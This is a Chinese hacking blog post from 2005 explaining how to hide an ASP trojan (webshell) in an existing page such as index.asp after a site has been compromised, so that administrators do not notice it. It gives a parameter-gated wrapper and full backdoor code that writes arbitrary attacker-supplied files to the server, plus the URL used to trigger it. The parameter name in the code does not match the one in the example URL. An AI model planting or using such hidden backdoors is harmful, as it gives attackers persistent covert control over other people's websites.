一种隐藏ASP木马的方法

得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
所以我们要隐藏好我们的SHELL
下面教一种很菜的方法,ASP插入法,不容易被发现~  

在我们要做手脚的ASP文件里加入如下内容

<% if request("action")="shell" then %>

****************************

<% end if %>



在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏揽。

================================
我们在index.asp隐藏自己的asp木马
把Newmm代码加到index.asp中


<% if request("huahua")="52" then %>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "save Success!" %>
<% else %>
<% response.write "Save UnSuccess!" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "
" %>
<% Response.write "保存文件的绝对路径(包括文件名:如D:\web\x.asp):" %>
<% Response.Write "" %>
<% Response.Write "
" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "
" %>
<% Response.write "输入马的内容:" %>
<% Response.write "" %>
<% Response.write "" %>
<% Response.write "
" %>
<% end if %>
然后我们打开http://qq/index.asp
一切正常,没什么反映
http://qq/index.asp后面加?ihai=52
http://qq/index.asp?ihai=52
看到我们马儿没
这个后门比较隐秘吧,总比我们一个有着自己名字的后门好吧







[本日志由 at1s 于 2005-03-25 05:03 PM 编辑]
上一篇: 小巧的Gif动画制作工具---giftools 3.1
下一篇: 让ASP木马不被杀
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志:
评论: 1 | 引用: 0 | 查看次数: 3755
英雄无敌
英雄无敌[2005-03-25 07:01 PM | | | 61.51.129.52 | del | 回复回复]
沙发
前提,需要filesystem组件支持~
发表评论
昵 称:
密 码: 游客发言不需要密码.
邮 箱: 邮件地址支持Gravatar头像,邮箱地址不会公开.
网 址: 输入网址便于回访.
内 容:
验证码:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 5000 字 | UBB代码 关闭 | [img]标签 关闭